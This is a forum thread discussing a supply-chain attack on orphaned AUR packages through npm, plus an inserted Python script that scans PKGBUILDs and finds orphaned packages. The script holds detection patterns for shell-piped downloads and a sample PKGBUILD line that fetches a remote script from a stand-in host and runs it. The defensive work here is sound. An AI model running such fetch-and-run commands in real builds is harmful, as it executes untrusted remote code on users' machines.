• placebo@lemmy.zip · 10 up · 4 days ago

      Tbf most major attacks we saw recently are cross-platform thanks to npm. AUR has always been a security risk.

    • Alaknár@sopuli.xyz · 4 up · 4 days ago

      Wasn’t that long ago when I was downvoted to oblivion for saying that. Glad to see the community is maturing.

  • macniel@feddit.org · 99 up, 3 down · 5 days ago

    Linux Users: haha those silly windows users, always searching the web for their software and getting viruses.
    Linux Users: oh no I got malware by searching the AUR!

    • rtxn@lemmy.world [M] · 44 up, 1 down · edited · 5 days ago

      The AUR is still safer. One, it is at least minimally moderated. If a malicious package is detected, it can be reported and removed. Two, the installer is usually not just a black box executable. Three, most of the build and runtime dependencies are from the official Arch repos, which provides some protection against supply chain attacks. For Windows installers, you have to trust the distributor to bundle clean DLLs (for that matter, the same applies to AppImages).

      But if it starts downloading anything from NPM… ^C and run.

      • Lucy :3@feddit.org · 23 up · 5 days ago

        The most unsafe factor of the AUR is AUR helpers and their goal to dumb everything down and streamline the process as if the AUR were an official repo.

        • CubitOom@infosec.pub · 8 up, 1 down · 4 days ago

          I’m not entirely sure I agree, I think the issue is with default settings.

          Like you could use both yay and paru to diff the PKGBUILD of the most recent update and then read it, and then approve each. And I think that’s pretty helpful. But you could also just blindly accept the update with the right config or flag and that is not a good practice.

          • bitfucker@programming.dev · 3 up · 4 days ago

            Yeah, use and promote aurto instead. They require you to trust the maintainer and would remove the package from the local repo if the maintainer is changed.

            • CubitOom@infosec.pub · 2 up · 4 days ago

              I’m not sure if losing the maintainer is the only thing we should be going off of here, but I like the name.

              • bitfucker@programming.dev · 1 up · 4 days ago

                Well, it is just like a distro maintainer account anyway. If the maintainer account is compromised then gg for the whole distro. That’s what happens with other supply chain attacks as well and yes, I do think we need a way to fix that without compromising on ease of usability.

                • CubitOom@infosec.pub · 1 up · 4 days ago

                  We aren’t talking about a distro maintainer, but an AUR package maintainer, which can be anyone.

    • Lucy :3@feddit.org · 9 up · 5 days ago

      By misusing the AUR and ignoring every warning telling you to read and understand the pkgbuild or don’t do it.

      • TerHu@lemmy.dbzer0.com · 16 up · 5 days ago

        As much as I love nvim and understand people who love emacs, there are people who want that big GUI thing. For those I’d recommend VSCodium if they feel like they really can’t live without VSCode or Gram for those who got to like Zed.

        • Thorry@feddit.org · 4 up · 4 days ago

          I was anti-GUI for years, having learnt to program on a tiny green and black 40x24 CRT on my old MSX back in the 80s. I remember being made fun of by fellow students and co-workers alike for doing almost everything in the terminal. This included huge projects with complex file trees and lots of files.

          But as time went on, I started to appreciate the GUI more and more. And these days I’m all for using a GUI for a lot of things.

          Especially in IDEs that can do a lot of things with short keyboard shortcuts. I now have multiple monitors, including a large 32" primary. I always have stacks upon stacks of windows open and manage them efficiently. There’s always at least a couple of terminals hanging out and of course most IDEs also have terminal windows baked in. But all of the extra visual tools help me out a lot.

          • voodooattack@lemmy.world · 2 up · 4 days ago

            Almost the exact opposite for me. Used to hog GUIs and hated keyboard shortcuts with a passion, but then I came across Niri, fell in love with the idea, and the whole scrolling window manager thing made my productivity explode. I can’t use traditional desktop environments anymore. Tried to go back and literally can’t.

            Tmux wasn’t that far behind.

            • tal@lemmy.today · 1 up · edited · 3 days ago

              and the whole scrolling window manager thing…tmux wasn’t that far behind

              I remember one time reflecting on how many layers I have at which one can expand workspace.

              1. Linux virtual terminals. By default, Debian runs 7 login sessions on seven virtual terminals and sticks the GUI (Wayland/Xorg) on the eighth. So Control-Alt-F1 through Control-Alt-F7 will get me a Linux terminal. I can stick more programs on more virtual terminals with openvt. That’s the first layer.

              2. Okay, so on virtual terminal 8, I’ve got Wayland running. On that, I’m running Sway. That has an infinite number of workspaces that can be created. Currently, I only have bindings set up for 10 (and I use nonstandard bindings for them, Super-q N to switch to the Nth workspace) because I didn’t find myself actually using named workspaces. This is the second layer.

              3. Within a workspace, I can have Wayland windows. Say I can have two or three windows reasonably visible. This can be expanded whenever opening a window; for example, Super-t to open a new virtual terminal emulator window. This is the third layer.

              4. One of the most common windows I use is a virtual terminal emulator, foot. That can run a program. I typically have it running tmux, which can have its own list of concurrently-running terminal programs (I use Control-O as the tmux meta key). This is the fourth layer.

              5. I often use emacs. Emacs has multiple “frames”; one can “clone” the current frame with C-x 5 c. When run in a terminal, this basically acts like another tmux-like layer where one shows one frame at a time. This is the fifth layer.

              6. Inside an emacs frame, one can have multiple emacs windows (analogous to what is typically called “panes” in other software) showing various things at the same time. One can open a new window with C-x 2 or C-x 3, cycle with C-x o. This is the sixth layer.

              7. Emacs has a list of buffers, any one of which can be shown in a given emacs window. A “buffer” is vaguely analogous to “an open file” in some other programs, but could also be showing a terminal emulator or similar. One can switch with C-x b. This is the seventh layer.

              8. Say I’m running a terminal emulator in one running bash (M-x term RET RET). bash has its own job control; one can suspend a running program and bring bash to the fore with Control-Z, list running jobs with jobs, then resume a suspended job in the background with $ bg %1 to background the first or bring a job to the foreground with $ fg %1. This isn’t quite the same thing as the other layers, since the screen state isn’t maintained for separate programs and restored, but it can reasonably allow one to run simultaneous things and follow each. This is the eighth layer.

              • voodooattack@lemmy.world · 1 up · 3 days ago

                Noping the heck outta that. All I want is better top-level organisation, you just described what I’d call an anti-pattern in my book.

                I wouldn’t nest things that deep through so many different tools/framework/layers that can’t talk to one another. That’s just asking for trouble. You’d waste one of two things: time searching or focus for memorising and recall, you lose something either way. And in the case of the latter you’re bound to forget and start wasting time to search over time anyway.

    • Siegfried@lemmy.world · 4 up · 4 days ago

      Did ClamAV work with the affected AUR packages? Sorry if the question is idiotic, ’cause I’m ignorant when it comes to security.

    • Crozekiel@lemmy.zip · 2 up · 3 days ago

      I am really curious about this. If someone had ClamAV and updated any of these packages from the AUR during the attack, would ClamAV have “solved” that problem? I would love to know the effectiveness of that.

    • helpImTrappedOnline@lemmy.world · 4 up · 3 days ago

      Well that’s fun. Odd that someone named Campbell was asking for a tomato soup recipe; you’d think that would just be built into their bloodline or something.

      While I’m glad no JS package managers were hurt to make the soup, I do wish the recipe didn’t waste so much water.

    • magnolia_mayhem@lemmy.world · 2 up · 3 days ago

      Just keep sending requests and use as many tokens as possible. My wife spent 30 minutes on the phone with a bot the other day, just getting it to dump huge sets of instructions to waste tokens.

      • CubitOom@infosec.pub · 7 up · 5 days ago

        Good question, I guess I might be using the wrong word when I say “orphan” because I see the Arch wiki uses that term differently:

        Orphans are packages that were installed as a dependency and are no longer required by any package.

        https://wiki.archlinux.org/title/Pacman/Tips_and_tricks

        You can remove these manually or if using an aur helper like yay there are flags/settings you can use to delete them after the desired package was installed.

        However what I was talking about aur packages that are unmaintained or do not have a maintainer anymore.

        I’m researching more at the moment.

        • Eager Eagle@lemmy.world · 6 up · 5 days ago

          shit, I had 150 orphaned packages

          pacman -Qdtq | pacman -Rns -

          I made an alias for this, but IMO this cleanup should be automatic. The user didn’t install it themselves after all.

    • littleomid@feddit.org · 8 up, 3 down · 5 days ago

      Waiting for updating doesn’t make any difference. The packages could be infected at any point.

      • CubitOom@infosec.pub · 7 up · edited · 5 days ago

        The packages could be infected at any point.

        I guess the same could be said for literally any open source or freely distributed project.

        The difference is that this was a supply chain attack and, to my knowledge, required the package to be listed as orphaned (unmaintained) first so that the PKGBUILD could be modified to install malicious NPM packages.

        The community caught it quickly because it is possible to read both the PKGBUILD and the output of the update and, I think, it is fully resolved as of now.

        Basically, if one were to delete or replace orphaned packages then they wouldn’t have been infected.

        It is also possible to add a CVE scanner for AUR packages if reading the PKGBUILD is too much, I’m looking into how to do that now.

        All this is to say that you should check if you had an infected package but I personally don’t think using the aur is more risky than using a flatpak.
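Two of the checks discussed in this thread, reading the PKGBUILD before approving an update and finding installed AUR packages that no longer have a maintainer, written out as an added example (not code from any poster, yay, paru or aurto). It assumes the AUR RPC v5 `info` JSON shape where `Maintainer` is null for an orphaned package, and the PKGBUILD and RPC response below are constructed samples.

```python
"""Defensive AUR checks: flag risky PKGBUILD lines and orphaned AUR packages.
Added example; assumes AUR RPC v5 /info returns results[].Maintainer == null
for orphaned packages (label: assumption)."""
import json
import re
import subprocess

# Patterns a reviewer would want to see before approving a PKGBUILD update:
# JS package-manager invocations and remote scripts piped straight into a shell.
SUSPICIOUS = [
    (re.compile(r"(?:^|[;&|(\s])(npm|npx|yarn|pnpm)\s+\S"), "JS package manager invocation"),
    (re.compile(r"\b(curl|wget)\b[^\n|]*\|\s*(ba)?sh\b"), "remote script piped to shell"),
    (re.compile(r"\bbase64\s+(-d|--decode)\b"), "base64-decoded payload"),
]


def scan_pkgbuild(text):
    """Return (line_no, reason, line) for each suspicious line of a PKGBUILD."""
    hits = []
    for n, line in enumerate(text.splitlines(), 1):
        code = line.split("#", 1)[0]  # ignore shell comments
        for pat, why in SUSPICIOUS:
            if pat.search(code):
                hits.append((n, why, line.strip()))
    return hits


def orphaned_packages(rpc_json, installed):
    """Names from `installed` whose AUR record has no maintainer, plus names
    the AUR no longer returns at all (deleted or never an AUR package)."""
    records = {r["Name"]: r for r in json.loads(rpc_json).get("results", [])}
    return [n for n in installed
            if records.get(n) is None or records[n].get("Maintainer") is None]


def installed_foreign():
    """Packages not from any sync repo (AUR or hand-built): `pacman -Qmq`."""
    out = subprocess.run(["pacman", "-Qmq"], capture_output=True, text=True, check=True)
    return out.stdout.split()


# Constructed sample inputs (not real packages or hosts).
SAMPLE_PKGBUILD = """\
# Maintainer: someone <constructed@example.invalid>
pkgname=example-app
pkgver=1.2.3
source=("https://example.invalid/$pkgname-$pkgver.tar.gz")
build() {
  cd "$pkgname-$pkgver"
  npm install --no-audit
  curl -s https://example.invalid/setup.sh | sh
}
"""
SAMPLE_RPC = json.dumps({"resultcount": 2, "results": [
    {"Name": "kept-pkg", "Maintainer": "alice"},
    {"Name": "orphan-pkg", "Maintainer": None},
]})

if __name__ == "__main__":
    for n, why, line in scan_pkgbuild(SAMPLE_PKGBUILD):
        print(f"PKGBUILD:{n}: {why}: {line}")
    print("orphaned:", orphaned_packages(SAMPLE_RPC, ["kept-pkg", "orphan-pkg", "gone-pkg"]))
```

On a real Arch host, feed `installed_foreign()` to the RPC (`https://aur.archlinux.org/rpc/v5/info?arg[]=...`) and pass the response to `orphaned_packages`; the PKGBUILD scan is a prompt to read the file, not a verdict.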

      • 87Six@lemmy.zip · 2 up, 1 down · 5 days ago

        Waiting for updating doesn’t make any difference.

        Are Linux users allowed to just lie like that? I thought if you do that you need to use Windows.

    • Albbi@piefed.ca · 3 up · 5 days ago

      They also wait until they get off the rollercoaster and back on solid ground before yelling yay!

      • pressanykeynow@lemmy.world · 22 up · 4 days ago

        But your brain should be the best antivirus you have.

        Is there an AUR package for it? Seems it’s not in the official repo.

      • placebo@lemmy.zip · 9 up · 4 days ago

        But your brain should be the best antivirus you have.

        It’s useful to use your brain, but any security layer has holes, which is why it’s useful to have several layers. Some attacks might be way beyond the user’s understanding or come from trusted sources.

      • UnderpantsWeevil@lemmy.world · 5 up · 4 days ago

        But your brain should be the best antivirus you have.

        True of virtually every OS.

        But “only stupid people get viruses” is exactly the kind of trap that catches folks.

      • AceSLive@lemmy.world · 2 up · 4 days ago

        I have ESET Home but now I’ve gone completely Linux, and they don’t do it for home - only business.

        Which sucks, as I have a year left on my subscription I can no longer use :/

    • Ghoelian@piefed.social · 10 up, 1 down · 4 days ago

      one thread I found from 2 years ago where someone asked for the same thing, a lot of the replies are just “you don’t need antivirus on Linux” lmao

      • CeeBee_Eh@lemmy.world · 2 up, 3 down · 4 days ago

        a lot of the replies are just “you don’t need antivirus on Linux”

        Which is completely true when using distros like Debian, Fedora, RHEL, openSUSE, etc.

        Arch (and its derivatives) is designed to be on the bleeding edge with ALL the paper cuts that come with it. It is absolutely not focused on stability or security. If you want those things then stick to Debian or Fedora Silverblue.

        And the second you introduce npm to your system you can throw any semblance of security out the window, regardless of what your operating system is, and no antivirus is going to save you.

        That being said, the fundamental security models between Linux and Windows are very different. And on Linux the overall impact will likely be far less damaging (technologically, not financially) than on Windows. Windows “security” is just a corporate marketing campaign.

          • CeeBee_Eh@lemmy.world · 2 up, 1 down · 3 days ago

            npm, yes. Snap and flatpak? No. I’m not saying it’s impossible to get malware. The difference is that snapd and flatpak have various levels of process isolation that largely mitigate any potential issues.

            The argument isn’t “Linux doesn’t have malware”, the argument is “you don’t need to run antivirus on Linux”. Those are two very different things.

            Not even the best antivirus will protect you completely, at that point you need good computer hygiene.

            • Crozekiel@lemmy.zip · 1 up · 3 days ago

              Eh. Flatpak has the option for process isolation, but it kinda works similarly to how Android apps have default permissions set and the packager can just go “nah, this gets FULL permissions” and unless you go look and change it yourself, the program isn’t restricted at all. I don’t use Ubuntu/snapd so can’t speak to that.

              There are more protections on flathub than the AUR for sure - the AUR is closer to just downloading random shit off the internet than a true repository. That said, it’s crazy to assign the vulnerabilities of the AUR to Arch as a whole… The Arch repos proper (and even Chaotic AUR) didn’t have problems during any of this.

              • CeeBee_Eh@lemmy.world · 2 up · 2 days ago

                Flatpak has the option for process isolation, but it kinda works similarly to how android apps have default permissions set and the packager can just go “nah, this gets FULL permissions” and unless you go look and change it yourself, the program isn’t restricted at all.

                You’re not wrong, but even with the AUR it’s (last I checked/heard) a problem with orphaned packages being picked up by random users, and then a “new” PKGBUILD with the malicious bits getting uploaded.

                The reality is that even if everyone just blindly updated through yay this whole time, very few people would be affected because the number of orphaned packages installed is very low. The package managers tend to bug you about orphaned packages.

                The difference with Flatpaks and the Snap Store is that you can’t just take ownership over an abandoned project. You’d have to create your own. And since Canonical is in charge of the Snap Store, they’re quick to react to any sort of security issue.

                the AUR is closer to just downloading random shit off the internet than a true repository

                Ultimately that is what it is. Because some packages are grabbing files from just about anywhere.

                The Arch repos proper (and even Chaotic AUR) didn’t have problems during any of this.

                And that’s really the key. The AUR is bleeding edge with a “here be dragons” philosophy. Like I said in my previous comment, if you can’t accept those dangers (work computer, sensitive data, etc) then simply don’t use Arch.